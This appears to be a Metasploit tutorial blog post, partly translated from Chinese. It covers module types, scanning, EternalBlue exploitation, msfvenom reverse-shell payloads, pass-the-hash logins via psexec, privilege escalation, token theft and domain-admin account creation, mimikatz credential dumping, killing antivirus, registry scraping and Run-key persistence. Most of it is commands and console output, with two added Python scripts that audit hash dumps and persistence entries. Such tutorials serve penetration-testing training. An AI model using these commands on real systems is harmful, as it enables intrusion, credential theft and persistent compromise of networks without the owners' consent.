Metasploit is a fairly handy penetration-testing tool.

Introduction

Basic framework

MSF stores its modules in the following directory by default:

/usr/share/metasploit-framework/modules/

Modules:

  • auxiliary: helper modules that perform information gathering, scanning, sniffing, fingerprinting, password guessing, DoS attacks and similar tasks

  • exploits: the action that attacks a system vulnerability; each module corresponds to the attack method (active or passive) for one specific vulnerability

  • payloads: the code or instructions that actually run on the target once an exploit succeeds. There are three kinds of payload: single, stagers and stages. Shellcode is a special payload used to obtain a shell.

    • single: all-in-one. A complete, self-contained payload that does not depend on external libraries or packages.
    • stagers: when memory on the target is limited, a small payload is sent first to establish the connection
    • stages: the follow-up payload downloaded over the connection the stager established
  • encoders: modules that encode (obfuscate) the payload to evade antivirus checks

  • nops: improve payload stability and keep its size consistent. When building the malicious data buffer for an exploit, a block of no-op instructions is commonly placed before the shellcode that is actually meant to run, so that when the exploit triggers and execution jumps to the shellcode there is a larger safe landing zone; this avoids shellcode execution failures caused by memory address randomisation, return-address miscalculation and similar problems, and makes the exploit more reliable.

  • post: post-exploitation modules. Once remote control of the target has been obtained, these carry out follow-on actions such as harvesting sensitive information and pivoting

  • evasion: built-in obfuscation against Windows Defender; its evasion effect is weak

Core libraries:

  • Ruby Extension (REX): handles almost all core functionality, such as setting up network sockets, network connections, formatting and all other basic functions.
  • MSF Core: provides the basic API and the actual core of the framework.
  • MSF Base: provides a friendly API for modules

msfconsole

use [auxiliary/exploit/payload/encoder]    select a specific module and start working with it
show [auxiliary/exploit/payload/encoder/options]    list the available modules of a given type (or the current module's options)
set [options/payload]    assign a value to a specific option
setg [options/payload]    assign a value to an option and make its scope global, so the value is kept when switching modules
run    launch an auxiliary module once all of its required options have been set
exploit    launch an exploit module
back    deselect the current module and return to the previous command context
info    list information about the module
search    search for modules matching the given criteria
check    check whether a specific target is vulnerable
sessions    list the currently available sessions; sessions -i id enters an interactive session
load/unload    load or unload external tooling, such as scanner plugins
route    add a route, e.g. so that traffic for a given subnet is sent through the compromised host

Scanning

TCP idle scan
When running Metasploit on Windows, keep the thread count at or below 16; on UNIX platforms, at or below 128

msf > use auxiliary/scanner/ip/ipidseq 
msf auxiliary(ipidseq) > show options
msf auxiliary(ipidseq) > set rhosts 192.168.2.0/24
rhosts => 192.168.2.0/24
msf auxiliary(ipidseq) > set threads 60
threads => 60
msf auxiliary(ipidseq) > run

Service scanning

Targeted scans
1) Server Message Block (SMB) protocol scan

msf > use auxiliary/scanner/smb/smb_version

2) Finding misconfigured MSSQL instances

msf > use auxiliary/scanner/mssql/mssql_ping  
msf auxiliary(mssql_ping) > set rhosts 192.168.2.0/24
rhosts => 192.168.2.0/24
msf auxiliary(mssql_ping) > set threads 255
threads => 255
msf auxiliary(mssql_ping) > run

3) SSH server scan

msf > search ssh_version

4) FTP scan

msf > use auxiliary/scanner/ftp/ftp_version   
msf auxiliary(ftp_version) > set threads 255
threads => 255
msf auxiliary(ftp_version) > set rhosts 192.168.2.0/24
rhosts => 192.168.2.0/24
msf auxiliary(ftp_version) > run

5) Simple Network Management Protocol (SNMP)

search snmp_login

Vulnerability scanning

MS17-010 vulnerability scan

use auxiliary/scanner/smb/smb_ms17_010 # load the vulnerability scanner module
show options # view the module's configuration options
set RHOSTS 192.168.1.1-254 # configure the scan targets
set THREADS 30 # configure the number of scanning threads
run # run the module

Scanning for VNC servers that accept an empty password
Recent VNC server versions no longer allow an empty password

msf > use auxiliary/scanner/vnc/vnc_none_auth

Exploitation

EternalBlue

msf > use exploit/windows/smb/ms17_010_eternalblue # load the MS17-010 EternalBlue exploit module
msf exploit(windows/smb/ms17_010_eternalblue) > show targets # list the valid targets
msf exploit(windows/smb/ms17_010_eternalblue) > info # view detailed information
msf exploit(ms17_010_eternalblue) > setg rhost 192.168.2.5 # set the target 192.168.2.5 as a global variable
rhost => 192.168.2.5
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp # use a reverse-connection payload
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > set lhost 192.168.2.3 # have meterpreter connect back to 192.168.2.3
lhost => 192.168.2.3
msf exploit(ms17_010_eternalblue) > show options # review the configured options

msfdb

Commands for managing the MSF database

msfdb init     # start and initialize the database
msfdb reinit # delete and reinitialize the database
msfdb delete # delete database and stop using it
msfdb start # start the database
msfdb stop # stop the database
msfdb status # check service status
msfdb run # start the database and run msfconsole

msfvenom

基本命令

1
2
3
msfvenom -h  
msfvenom -l payloads 查看一下payload
msfvenom -l encoders 查看编码

Windows:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform Windows -f exe > shell.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.13 LPORT=3333 -f exe > shell.exe

Linux:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform Linux -f elf > shell.elf

meterpreter

基本命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
background  # 让meterpreter处于后台模式  
sessions -i index # 与会话进行交互,index表示第一个session
quit # 退出会话
shell # 获得控制台权限
irb # 开启ruby终端
ps # 查看当前活跃进程
migrate pid # 将Meterpreter会话移植到进程数位pid的进程中
kill pid # 杀死进程
getpid # 获取当前进程的pid
sysinfo # 查看目标机系统信息,如机器名,操作系统等
shutdown # 关机
screenshot 截屏
sysinfo 系统运行的平台信息
getuid 查看权限
getwd 获取目标机器的工作目录
getlwd 得到当前系统的工作目录
run post/windows/gather/checkvm 确定是不是虚拟机

File operations

Upload a file to the target host and download a file from it

meterpreter > upload /root/1.txt c:\\
[*] uploading : /root/1.txt -> c:\
[*] uploaded : /root/1.txt -> c:\\1.txt

meterpreter > download c:/2.txt /root
[*] Downloading: c:/2.txt -> /root/2.txt
[*] Downloaded 5.00 B of 5.00 B (100.0%): c:/2.txt -> /root/2.txt
[*] download : c:/2.txt -> /root/2.txt

Search for files on the target host

meterpreter > search -h 
Usage: search [-d dir] [-r recurse] -f pattern [-f pattern]...
Search for files.

OPTIONS:

-d <opt> The directory/drive to begin searching from. Leave empty to search all drives. (Default: )
-f <opt> A file pattern glob to search for. (e.g. *secret*.doc?)
-h Help Banner.
-r <opt> Recursivly search sub directories. (Default: true)

meterpreter > search -d c:\\ -r false -f *.txt
Found 2 results...
c:\1.txt (2 bytes)
c:\2.txt (5 bytes)

3389

Enabling 3389 (Remote Desktop)

meterpreter > run post/windows/manage/enable_rdp

[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20180430181213_default_192.168.1.187_host.windows.cle_516653.txt
meterpreter > netstat -ano

Connection list
===============

Proto Local address Remote address State User Inode PID/Program name
----- ------------- -------------- ----- ---- ----- ----------------
tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 696/svchost.exe
tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:3389 0.0.0.0:* LISTEN 0 0 1040/svchost.exe

Forward the remote host's port 3389 to local port 1234

meterpreter > portfwd add -l 1234 -r 192.168.1.187 -p 3389
[*] Local TCP relay created: :1234 <-> 192.168.1.187:3389

Password hashes

Obtaining password hashes
A hash beginning with aad3b435 is an empty or non-existent hash: the placeholder for an empty string

meterpreter > use priv
[-] The 'priv' extension has already been loaded.
meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 24a05299b237d9f48c9eff1c6a88a57e...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:db3dd3018cff8541ab7168f899737020:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
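
As an added example (not part of the original post), the Python below parses hashdump output in the pwdump format shown above and flags what a defender auditing such a dump looks for: accounts whose NT hash is the hash of the empty string (a blank password), accounts that still store an LM hash, and accounts sharing one NT hash (and therefore one password, since the NT hash is unsalted). The sample dump reuses the two lines above plus two constructed accounts.

```python
import re

# LM hash of an empty/absent password: the aad3b435... placeholder explained above
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash (unsalted MD4) of the empty string: an account with this NT hash has a blank password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump format: user:rid:lmhash:nthash:::
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# Constructed sample: the two lines dumped above plus two made-up accounts
SAMPLE_DUMP = """\
[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:db3dd3018cff8541ab7168f899737020:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:0123456789abcdef0123456789abcdef:db3dd3018cff8541ab7168f899737020:::
helpdesk:1002:aad3b435b51404eeaad3b435b51404ee:0011223344556677889900aabbccddee:::
"""

def parse_line(line):
    """Return (user, rid, lm, nt) for a pwdump line, or None for status text."""
    m = PWDUMP_RE.match(line.strip())
    if not m:
        return None
    return m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()

def audit_hashdump(text):
    """Return (user, rid, issue) tuples: blank passwords, stored LM hashes, shared passwords."""
    accounts = [a for a in map(parse_line, text.splitlines()) if a]
    findings, by_nt = [], {}
    for user, rid, lm, nt in accounts:
        if nt == EMPTY_NT:
            findings.append((user, rid, "blank password"))
        else:
            by_nt.setdefault(nt, []).append((user, rid))  # group non-empty NT hashes
        if lm != EMPTY_LM:
            findings.append((user, rid, "LM hash present"))
    for users in by_nt.values():
        if len(users) > 1:  # identical unsalted NT hash means identical password
            for user, rid in users:
                others = ", ".join(u for u, _ in users if u != user)
                findings.append((user, rid, f"password shared with {others}"))
    return findings
```

Call `audit_hashdump(SAMPLE_DUMP)`; the sample yields four findings (Guest blank, svc_backup LM, and the Administrator/svc_backup shared password pair).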

Log in using the obtained administrator hash

msf > use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as


Exploit target:

Id Name
-- ----
0 Automatic


msf exploit(windows/smb/psexec) > set rhost 192.168.1.187
rhost => 192.168.1.187
msf exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/psexec) > set lhost 192.168.1.130
lhost => 192.168.1.130
msf exploit(windows/smb/psexec) > set lpost 4333
lpost => 4333
msf exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:db3dd3018cff8541ab7168f899737020
SMBPass => aad3b435b51404eeaad3b435b51404ee:db3dd3018cff8541ab7168f899737020
msf exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(windows/smb/psexec) > exploit
[*] Started reverse TCP handler on 192.168.1.230:1444
[*] 192.168.1.187:445 - Connecting to the server...
[*] 192.168.1.187:445 - Authenticating to 192.168.1.187:445 as user 'Administrator'...
[*] 192.168.1.187:445 - Selecting PowerShell target
[*] 192.168.1.187:445 - Executing the payload...
[+] 192.168.1.187:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (205891 bytes) to 192.168.1.187
[*] Meterpreter session 1 opened (192.168.1.230:1444 -> 192.168.1.187:49468) at 2018-04-30 18:48:56 -0400

meterpreter >

Privilege escalation

meterpreter > use priv
[-] The 'priv' extension has already been loaded.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

bypassuac

meterpreter > background
[*] Backgrounding session 1...
msf exploit(windows/smb/psexec) > use exploit/windows/local/bypassuac
msf exploit(windows/local/bypassuac) > set session 1
session => 1
msf exploit(windows/local/bypassuac) > exploit

Token impersonation

1) incognito

meterpreter > use incognito 
Loading extension incognito...Success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
WIN-VONVJ6OMEQ7\Administrator

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

2) ps: find the PID of a domain administrator's process (it is not always visible)

meterpreter > ps
meterpreter > steal_token <pid> # steal the domain administrator's token

Use the domain administrator's token to create a user and grant it domain administrator rights
Example

meterpreter > impersonate_token SNEAKS.IN\\domainadmin
meterpreter > add_user qy qy -h 192.168.1.5 # -h is the address of the host on which the account is created
meterpreter > add_group_user "Domain Admins" qy -h 192.168.1.5

Attacking other hosts through a pivot

meterpreter > run get_local_subnets # list the local subnets

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.1.0/255.255.255.0

meterpreter > background
[*] Backgrounding session 1...

msf exploit(windows/local/bypassuac) > route add 192.168.2.0 255.255.255.0 1 # tell the framework to route traffic for the remote subnet through session 1
[*] Route added
msf exploit(windows/local/bypassuac) > route print # display the currently active routes

IPv4 Active Routing Table
=========================

Subnet Netmask Gateway
------ ------- -------
192.168.2.0 255.255.255.0 Session 1

Obtaining account passwords

meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate WORKGROUP WIN-VONVJ6OMEQ7$
0;46406 NTLM
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;999 NTLM WORKGROUP WIN-VONVJ6OMEQ7$

Using scripts

1) vnc

meterpreter > run vnc # install a VNC session on the remote system
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.230 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Windows\TEMP\jzoEGmzImp.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.230:4545...

meterpreter > run screen_unlock # unlock the desktop on the target machine
[!] Meterpreter scripts are deprecated. Try post/windows/escalate/screen_unlock.
[!] Example: run post/windows/escalate/screen_unlock OPTION=value [...]
[*] no working target found

2) List the software installed on the system

meterpreter > run post/windows/gather/enum_applications

[*] Enumerating applications installed on WIN-VONVJ6OMEQ7

Installed Applications
======================

Name Version
---- -------
2345好压 v5.9
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 14.0.24215.1
Microsoft Visual C++ 2015 x64 Additional Runtime - 14.0.24215 14.0.24215
Microsoft Visual C++ 2015 x64 Minimum Runtime - 14.0.24215 14.0.24215
Python 2.7.13 (64-bit) 2.7.13150
VMware Tools 10.2.0.7259539


[+] Results stored in: /root/.msf4/loot/20180501054603_default_192.168.1.187_host.application_930049.txt

3) Migrate to a stable process

meterpreter > getpid
Current pid: 1128

meterpreter > run post/windows/manage/migrate
[*] Running module against WIN-VONVJ6OMEQ7
[*] Current server process: spoolsv.exe (1128)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3592
[+] Successfully migrated to process 3592

meterpreter > getpid
Current pid: 3592

4) Kill antivirus software

meterpreter > run killav

[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...

5) View all traffic on the target machine

meterpreter > run packetrecorder -i 1
[!] Meterpreter scripts are deprecated. Try post/windows/manage/rpcapd_start.
[!] Example: run post/windows/manage/rpcapd_start OPTION=value [...]
[*] Starting Packet capture on interface 1
[+] Packet capture started
[*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/WIN-VONVJ6OMEQ7_20180501.0138/WIN-VONVJ6OMEQ7_20180501.0138.cap
[*] Packet capture interval is 30 Seconds

6) Obtain the hashes of the target's system users

meterpreter > run hashdump

[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 24a05299b237d9f48c9eff1c6a88a57e...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:db3dd3018cff8541ab7168f899737020:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

7) Obtain detailed system information
User names and passwords, a download of the entire registry, password-hash mining and system information gathering

meterpreter > run scraper
[*] New session on 192.168.1.187:445...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\Windows\TEMP\JKaHEoEs.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\Windows\TEMP\qCMsnidu.reg)
[*] Cleaning HKLM
[*] Exporting HKCC
[*] Downloading HKCC (C:\Windows\TEMP\PTbboPFX.reg)
[*] Cleaning HKCC
[*] Exporting HKCR
[*] Downloading HKCR (C:\Windows\TEMP\AQMWnvZo.reg)
[*] Cleaning HKCR
[*] Exporting HKU
[*] Downloading HKU (C:\Windows\TEMP\XNLnHUgE.reg)
[*] Cleaning HKU
[*] Completed processing on 192.168.1.187:445...

8) Persistence
-X start at boot, -i 40 reconnect every 40 seconds, -p specify the port

meterpreter > run persistence -X -i 40 -p 443 -r 192.168.1.187 

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-VONVJ6OMEQ7_20180501.2631/WIN-VONVJ6OMEQ7_20180501.2631.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.187 LPORT=443
[*] Persistent agent script is 99671 bytes long
[+] Persistent Script written to C:\Windows\TEMP\ManzZNr.vbs
[*] Executing script C:\Windows\TEMP\ManzZNr.vbs
[+] Agent executed with PID 3852
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\KHNDPfTiTa
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\KHNDPfTiTa
Start the handler that receives the connection

msf > use multi/handler
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.187
lhost => 192.168.1.187
msf exploit(multi/handler) > set lport 443
lport => 443
msf exploit(multi/handler) > exploit
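
The persistence script above drops a .vbs into C:\Windows\TEMP and registers it under the Run key with a random value name. As an added defender-side example (not from the original post and not Metasploit code), the Python below audits a set of Run-key values for exactly those traits. The sample values, the temp-directory list and the random-name threshold are constructed assumptions to tune per environment.

```python
import re

RUN_KEY = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"

# Script types that wscript/cscript/mshta/powershell will autorun (assumed list)
SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".ps1", ".bat", ".cmd")
# Locations a legitimate autorun rarely lives in (assumption: tune per environment)
TEMP_DIRS = ("\\windows\\temp\\", "\\appdata\\local\\temp\\")

# A Run value is a command line: a quoted or bare path, possibly followed by arguments
TOKEN_RE = re.compile(r'"([^"]+)"|(\S+)')

# Constructed sample values; the first mirrors the entry the persistence script created
SAMPLE_RUN_VALUES = {
    "KHNDPfTiTa": r"C:\Windows\TEMP\ManzZNr.vbs",
    "VMware User Process": r'"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr',
    "SecurityHealth": r"%windir%\system32\SecurityHealthSystray.exe",
    "Updater": r"wscript.exe //B C:\Users\qy\AppData\Local\Temp\upd.js",
}

def launched_path(command):
    """Return the first path-like token (one containing a backslash), else the first token."""
    tokens = [quoted or bare for quoted, bare in TOKEN_RE.findall(command)]
    return next((t for t in tokens if "\\" in t), tokens[0] if tokens else "")

def case_transitions(name):
    """Count upper/lower flips between adjacent letters; random names flip a lot."""
    pairs = zip(name, name[1:])
    return sum(1 for a, b in pairs if a.isalpha() and b.isalpha() and a.isupper() != b.isupper())

def audit_run_entry(name, command):
    """Return the reasons this Run value looks like script-based persistence (empty if clean)."""
    path = launched_path(command).lower()
    reasons = []
    if any(d in path for d in TEMP_DIRS):
        reasons.append("launches from a temp directory")
    if path.endswith(SCRIPT_EXT):
        reasons.append("autoruns a script")
    if case_transitions(name) >= 4:  # heuristic threshold, an assumption
        reasons.append("random-looking value name")
    return reasons

def audit_run_values(values):
    """Map each suspicious value (full key path) to its reasons; clean values are omitted."""
    flagged = {}
    for name, command in values.items():
        reasons = audit_run_entry(name, command)
        if reasons:
            flagged[f"{RUN_KEY}\\{name}"] = reasons
    return flagged
```

On a live host the same functions can be fed the output of `reg query` for the Run key; the cleanup .rc file the script reports is the quickest way to undo an entry you did install yourself.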

9) List all post-exploitation modules

After typing run post/, press Tab

meterpreter > run post/
Display all 207 possibilities? (y or n)

Reference:
MSF: Basic usage and the Exploit module (Part 1)